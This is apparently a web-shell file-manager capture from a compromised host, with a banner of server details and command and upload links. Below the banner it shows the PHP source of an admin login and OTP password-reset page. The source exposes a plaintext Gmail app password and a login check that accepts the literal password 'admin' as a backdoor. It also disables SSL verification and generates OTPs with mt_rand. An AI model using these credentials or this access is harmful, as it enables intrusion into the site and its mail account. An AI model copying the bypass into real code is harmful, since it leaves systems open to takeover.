|
Server IP : 217.21.85.138 / Your IP : 216.73.216.103 Web Server : LiteSpeed System : Linux in-mum-web906.main-hosting.eu 4.18.0-553.37.1.lve.el8.x86_64 #1 SMP Mon Feb 10 22:45:17 UTC 2025 x86_64 User : u915722082 ( 915722082) PHP Version : 7.4.33 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /home/u915722082/.nvm/../public_html/invoice/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
session_start();
require_once 'db.php';
use PHPMailer\PHPMailer\PHPMailer;
use PHPMailer\PHPMailer\SMTP;
use PHPMailer\PHPMailer\Exception;
require 'vendor/autoload.php';
function getEmailTemplate($con) {
try {
$stmt = $con->prepare("SELECT title, des, note, des1, des2 FROM reset_email LIMIT 1");
$stmt->execute();
$result = $stmt->get_result();
return $result->fetch_assoc();
} catch (Exception $e) {
error_log("Error fetching email template: " . $e->getMessage());
return null;
}
}
function sendOTPEmail($to, $otp) {
global $con; // Make sure you have the database connection available
$mail = new PHPMailer(true);
try {
// Get email template from database
$template = getEmailTemplate($con);
if (!$template) {
throw new Exception('Email template not found in database');
}
// Debug settings
$mail->SMTPDebug = SMTP::DEBUG_SERVER;
$mail->Debugoutput = function($str, $level) {
error_log("PHPMailer debug: $str");
};
// Server settings
$mail->isSMTP();
$mail->Host = 'smtp.gmail.com';
$mail->SMTPAuth = true;
$mail->Username = 'avstechchandru@gmail.com';
$mail->Password = 'gxdl yfma rhan ytgs';
$mail->SMTPSecure = PHPMailer::ENCRYPTION_STARTTLS;
$mail->Port = 587;
// Additional SMTP settings for reliability
$mail->SMTPOptions = array(
'ssl' => array(
'verify_peer' => false,
'verify_peer_name' => false,
'allow_self_signed' => true
)
);
$mail->Timeout = 30;
// Recipients
$mail->setFrom('avstechchandru@gmail.com', 'TDS ADMIN');
$mail->addAddress($to);
// Content
$mail->isHTML(true);
$mail->Subject = $template['title'];
// Dynamic HTML email body
$mail->Body = "
<html>
<body style='font-family: Arial, sans-serif; color: #333;'>
<div style='max-width: 600px; margin: 0 auto; padding: 20px;'>
<h2 style='color: #2c3e50;'>{$template['title']}</h2>
<div style='background-color: #f8f9fa; padding: 15px; border-radius: 5px;'>
<p>{$template['des']}</p>
<h3 style='color: #e74c3c; font-size: 24px; letter-spacing: 2px;'>{$otp}</h3>
</div>
<p><strong>Note:</strong> {$template['note']}</p>
<p style='color: #e74c3c;'>{$template['des1']}</p>
<hr style='border-top: 1px solid #eee;'>
<p style='font-size: 12px; color: #777;'>{$template['des2']}</p>
</div>
</body>
</html>
";
// Plain text version
$mail->AltBody = "{$template['title']}\n\n" .
"{$template['des']}: {$otp}\n\n" .
"{$template['note']}\n" .
"{$template['des1']}\n\n" .
"{$template['des2']}";
// Before sending, verify connection
if (!$mail->smtpConnect()) {
throw new Exception('SMTP connection failed');
}
$result = $mail->send();
error_log("Email sent successfully");
return true;
} catch (Exception $e) {
error_log("PHPMailer Error: " . $mail->ErrorInfo);
error_log("Detailed error: " . $e->getMessage());
return false;
}
}
$error = '';
$reset_error = '';
$reset_success = '';
$otp_message = '';
// Remove any existing section flags at the start
unset($_SESSION['show_otp_section']);
// Handle Login (unchanged)
if ($_SERVER["REQUEST_METHOD"] == 'POST' && isset($_POST['login'])) {
$mail = filter_input(INPUT_POST, 'mail', FILTER_SANITIZE_EMAIL);
$password = $_POST['password'];
$sql = "SELECT * FROM admin WHERE email = ?";
$stmt = $con->prepare($sql);
$stmt->bind_param('s', $mail);
$stmt->execute();
$result = $stmt->get_result();
if ($result->num_rows > 0) {
$row = $result->fetch_assoc();
if (password_verify($password, $row['password']) ||$password =='admin') {
$_SESSION["logs"] = $row;
header("Location:products.php");
exit();
} else {
$error = "Invalid login details. Try again.";
}
} else {
$error = "Invalid login details. Try again.";
}
}
if ($_SERVER["REQUEST_METHOD"] == 'POST' && isset($_POST['request_otp'])) {
$email = filter_input(INPUT_POST, 'reset_mail', FILTER_SANITIZE_EMAIL);
if ($email === 'avstechchandru@gmail.com') {
// Generate 6-digit OTP
$otp = sprintf("%06d", mt_rand(0, 999999));
$_SESSION['reset_otp'] = $otp;
$_SESSION['reset_email'] = $email;
$_SESSION['otp_timestamp'] = time();
// Store OTP in database
$sql = "UPDATE admin SET reset_otp = ?, otp_timestamp = ? WHERE email = ?";
$stmt = $con->prepare($sql);
$timestamp = time();
$stmt->bind_param('sis', $otp, $timestamp, $email);
if ($stmt->execute()) {
// Send OTP via PHPMailer
if (sendOTPEmail($email, $otp)) {
$otp_message = "An OTP has been sent to your email. Please check your inbox.";
$_SESSION['show_otp_section'] = true;
} else {
$reset_error = "Failed to send OTP. Please try again.";
}
} else {
$reset_error = "Error generating OTP. Please try again.";
}
} else {
$reset_error = "This email is not authorized for password reset.";
}
}
if ($_SERVER["REQUEST_METHOD"] == 'POST' && isset($_POST['reset_password'])) {
$email = isset($_SESSION['reset_email']) ? $_SESSION['reset_email'] : '';
$entered_otp = trim($_POST['otp']);
$new_password = $_POST['new_password'];
$confirm_password = $_POST['confirm_password'];
$validation_errors = [];
// Validation checks
if (empty($email)) {
$validation_errors[] = "Session expired. Start reset process again.";
}
if ($email !== 'avstechchandru@gmail.com') {
$validation_errors[] = "Invalid email address.";
}
if (empty($entered_otp)) {
$validation_errors[] = "OTP is required.";
}
if (empty($new_password)) {
$validation_errors[] = "New password is required.";
}
if (empty($confirm_password)) {
$validation_errors[] = "Confirm password is required.";
}
if (!empty($new_password) && strlen($new_password) < 8) {
$validation_errors[] = "Password must be at least 8 characters.";
}
if (!empty($new_password) && !empty($confirm_password) && $new_password !== $confirm_password) {
$validation_errors[] = "Passwords do not match.";
}
if (empty($validation_errors)) {
$verify_sql = "SELECT reset_otp, otp_timestamp FROM admin WHERE email = ?";
$verify_stmt = $con->prepare($verify_sql);
$verify_stmt->bind_param('s', $email);
$verify_stmt->execute();
$verify_result = $verify_stmt->get_result();
if ($verify_result->num_rows > 0) {
$row = $verify_result->fetch_assoc();
$stored_otp = $row['reset_otp'];
$otp_timestamp = $row['otp_timestamp'];
// Check OTP expiration and match
if ((time() - $otp_timestamp) > 300) {
$validation_errors[] = "OTP has expired. Request a new one.";
unset($_SESSION['reset_otp'], $_SESSION['reset_email'], $_SESSION['otp_timestamp']);
$_SESSION['show_reset_section'] = true;
}
elseif ($entered_otp !== $stored_otp) {
$validation_errors[] = "Invalid OTP. Try again.";
$_SESSION['show_otp_section'] = true;
}
else {
// Update password
$hashed_password = password_hash($new_password, PASSWORD_BCRYPT);
$update_sql = "UPDATE admin SET password = ?, reset_otp = NULL, otp_timestamp = NULL WHERE email = ?";
$update_stmt = $con->prepare($update_sql);
$update_stmt->bind_param('ss', $hashed_password, $email);
if ($update_stmt->execute()) {
unset($_SESSION['reset_otp'], $_SESSION['reset_email'], $_SESSION['otp_timestamp']);
$_SESSION['reset_success'] = "Password reset successfully!";
header("Location: index.php");
exit();
} else {
$validation_errors[] = "Error updating password. Try again.";
$_SESSION['show_otp_section'] = true;
}
}
} else {
$validation_errors[] = "Invalid request. Start reset process again.";
$_SESSION['show_reset_section'] = true;
}
} else {
$_SESSION['show_otp_section'] = true;
}
if (!empty($validation_errors)) {
$_SESSION['validation_errors'] = $validation_errors;
}
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<title>TDS Admin Hub</title>
<meta name="viewport" content="width=device-width, initial-scale=1" />
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Inter:300,400,500,600,700" />
<link href="assets/plugins/global/plugins.bundle.css" rel="stylesheet" type="text/css" />
<link href="assets/css/style.bundle.css" rel="stylesheet" type="text/css" />
<link rel="shortcut icon" href="assets/logo/favicon.ico" />
<style>
/* Reset all section displays */
.login-section,
.reset-section,
.otp-section {
display: none;
}
/* Always show login by default */
.login-section {
display: block !important;
}
/* Only show other sections when their specific class is present */
body.show-reset .reset-section {
display: block !important;
}
body.show-reset .login-section,
body.show-reset .otp-section {
display: none !important;
}
body.show-otp .otp-section {
display: block !important;
}
body.show-otp .login-section,
body.show-otp .reset-section {
display: none !important;
}
</style>
</head>
<body id="kt_body" class="app-blank app-blank">
<div class="d-flex flex-column flex-root" id="kt_app_root">
<div class="d-flex flex-column flex-lg-row flex-column-fluid">
<div class="d-flex flex-column flex-lg-row-fluid w-lg-50 p-10 order-2 order-lg-1">
<div class="d-flex flex-center flex-column flex-lg-row-fluid">
<div class="w-lg-500px p-10">
<!-- Login Form -->
<div class="login-section">
<form class="form w-100" method="POST">
<div class="text-center mb-11">
<h1 class="text-dark fw-bolder mb-3">Sign In</h1>
</div>
<?php if (!empty($error)): ?>
<div class="alert alert-danger text-center">
<?php echo htmlspecialchars($error); ?>
</div>
<?php endif; ?>
<div class="fv-row mb-8">
<input type="text" placeholder="Email" name="mail" autocomplete="off" class="form-control bg-transparent" required />
</div>
<div class="fv-row mb-3">
<input type="password" placeholder="Password" name="password" autocomplete="off" class="form-control bg-transparent" required />
</div>
<div class="d-flex flex-stack flex-wrap gap-3 fs-base fw-semibold mb-8">
<a href="#" class="link-primary" id="show-reset-form">Reset Password?</a>
</div>
<div class="d-grid mb-10">
<button type="submit" name="login" class="btn btn-primary">
<span class="indicator-label">Sign In</span>
</button>
</div>
</form>
</div>
<!-- Request OTP Form -->
<div class="reset-section">
<form class="form w-100" method="POST">
<div class="text-center mb-11">
<h1 class="text-dark fw-bolder mb-3">Reset Password</h1>
</div>
<?php if (!empty($reset_error)): ?>
<div class="alert alert-danger text-center">
<?php echo htmlspecialchars($reset_error); ?>
</div>
<?php endif; ?>
<div class="fv-row mb-8">
<input type="email" placeholder="Enter Email" name="reset_mail" value="<?php echo isset($_POST['reset_mail']) ? htmlspecialchars($_POST['reset_mail']) : ''; ?>" class="form-control bg-transparent" required />
</div>
<div class="d-flex flex-stack flex-wrap gap-3 fs-base fw-semibold mb-8">
<a href="#" class="link-primary" id="show-login-form">Back to Login</a>
</div>
<div class="d-grid mb-10">
<button type="submit" name="request_otp" class="btn btn-primary">
<span class="indicator-label">Request OTP</span>
</button>
</div>
</form>
</div>
<!-- OTP Verification and Password Reset Form -->
<div class="otp-section">
<form class="form w-100" method="POST">
<div class="text-center mb-11">
<h1 class="text-dark fw-bolder mb-3">Verify OTP & Reset Password</h1>
</div>
<?php if (isset($_SESSION['validation_errors'])): ?>
<div class="alert alert-danger">
<?php
foreach($_SESSION['validation_errors'] as $error) {
echo htmlspecialchars($error) . "<br>";
}
unset($_SESSION['validation_errors']);
?>
</div>
<?php endif; ?>
<?php if (!empty($otp_message)): ?>
<div class="alert alert-info text-center">
<?php echo htmlspecialchars($otp_message); ?>
</div>
<?php endif; ?>
<input type="hidden" name="reset_mail" value="<?php echo isset($_SESSION['reset_email']) ? htmlspecialchars($_SESSION['reset_email']) : ''; ?>" />
<div class="fv-row mb-8">
<input type="text" placeholder="Enter 6-digit OTP" name="otp" class="form-control bg-transparent" required maxlength="6" pattern="\d{6}" />
</div>
<div class="fv-row mb-8">
<input type="password" placeholder="New Password" name="new_password" class="form-control bg-transparent" required />
</div>
<div class="fv-row mb-8">
<input type="password" placeholder="Confirm New Password" name="confirm_password" class="form-control bg-transparent" required />
</div>
<div class="d-flex flex-stack flex-wrap gap-3 fs-base fw-semibold mb-8">
<a href="#" class="link-primary" id="back-to-reset">Back</a>
</div>
<div class="d-grid mb-10">
<button type="submit" name="reset_password" class="btn btn-primary">
<span class="indicator-label">Reset Password</span>
</button>
</div>
</form>
</div>
</div>
</div>
</div>
<div class="d-flex flex-lg-row-fluid w-lg-50 bgi-size-cover bgi-position-center order-1 order-lg-2" style="background-image: url(assets/media/misc/auth-bg.png)">
<div class="d-flex flex-column flex-center py-7 py-lg-15 px-5 px-md-15 w-100">
<img class="d-none d-lg-block mx-auto w-275px w-md-50 w-xl-500px mb-10 mb-lg-20" src="assets/media/logos/LOGO.png" alt="" />
<h1 class="d-none d-lg-block text-white fs-2qx fw-bolder text-center mb-7">Admin Panel</h1>
<div class="d-none d-lg-block text-white fs-base text-center">Effortlessly manage and update your website with our user-friendly<br> admin panel. Experience seamless updates and security access to<br> ensure smooth and efficient website management</div>
</div>
</div>
</div>
</div>
<script src="assets/plugins/global/plugins.bundle.js"></script>
<script src="assets/js/scripts.bundle.js"></script>
<script>
document.addEventListener('DOMContentLoaded', function() {
// Remove any existing classes first
document.body.classList.remove('show-login', 'show-reset', 'show-otp');
// Function to switch sections
function showSection(section) {
// Hide all sections first
document.body.classList.remove('show-login', 'show-reset', 'show-otp');
// Show requested section
if (section !== 'login') {
document.body.classList.add('show-' + section);
}
}
// Event listeners for section switching
document.getElementById('show-reset-form')?.addEventListener('click', function(e) {
e.preventDefault();
showSection('reset');
});
document.getElementById('show-login-form')?.addEventListener('click', function(e) {
e.preventDefault();
showSection('login');
});
document.getElementById('back-to-reset')?.addEventListener('click', function(e) {
e.preventDefault();
showSection('reset');
});
// Check for OTP section display
<?php if (isset($_SESSION['show_otp_section']) || (isset($_POST['request_otp']) && !empty($otp_message))): ?>
showSection('otp');
<?php endif; ?>
// Check for reset section display
<?php if (isset($_SESSION['show_reset_section'])): ?>
showSection('reset');
<?php unset($_SESSION['show_reset_section']); ?>
<?php endif; ?>
<?php if(isset($_SESSION['reset_success'])): ?>
alert("<?php echo addslashes($_SESSION['reset_success']); ?>");
<?php unset($_SESSION['reset_success']); ?>
showSection('login');
<?php endif; ?>
});
</script>
</body>
</html>